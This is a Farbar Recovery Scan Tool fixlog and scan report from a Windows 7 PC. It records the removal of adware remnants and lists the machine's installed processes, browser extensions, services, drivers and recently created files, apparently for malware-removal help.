C:\Windows\Minidump\030218-8314-01.dmp => moved successfully
C:\Windows\Minidump\030218-8564-01.dmp => moved successfully
C:\Windows\Minidump\030218-7675-01.dmp => moved successfully
C:\Windows\Minidump\030218-10608-01.dmp => moved successfully
C:\Windows\Minidump\030218-7129-01.dmp => moved successfully
C:\Windows\MEMORY.DMP => moved successfully
C:\Windows\Minidump\030118-7472-01.dmp => moved successfully
C:\Users\Martin\AppData\Roaming\LookUpPro => moved successfully
C:\ProgramData\616ca8e3-9bd6-4a32-a4f3-3640822a6c06 => moved successfully
"C:\Windows\System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179}" => not found
C:\Program Files (x86)\One => moved successfully
C:\Users\Martin\AppData\Roaming\eiab2yplwq4 => moved successfully
C:\Users\Martin\AppData\Local\installer.dat => moved successfully
C:\Windows\uninstaller.dat => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 17848217 B
Java, Flash, Steam htmlcache => 683386996 B
Windows/system/drivers => 22004 B
Edge => 0 B
Chrome => 48358772 B
Firefox => 423622595 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 58558475 B
systemprofile32 => 66356 B
LocalService => 66228 B
NetworkService => 4314722 B
Martin => 4475750 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 1.2 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 19-03-2018 16:51:43)


Result of scheduled keys to remove after reboot:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6230731C-1C18-4CF1-A20D-7132A76583D3} => could not remove. Access Denied.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F050547-040E-7E04-7811-0A0B797E1179} => could not remove. Access Denied.

==== End of Fixlog 16:51:43 ====

 

 

 

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Martin (administrator) on OVERLORD (19-03-2018 16:59:13)
Running from D:\User profile\Desktop
Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 ayj9xjuk; C:\Windows\System32\Drivers\ayj9xjuk.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-18 09:03 - 2018-03-19 16:59 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-19 16:56 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-19 16:56 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-19 16:50 - 001422732 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 11:52 - 2018-03-01 11:52 - 000088024 _____ C:\Windows\system32\Drivers\ddd6ebd91f4ecf7d7f74107288edb1a0.sys
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
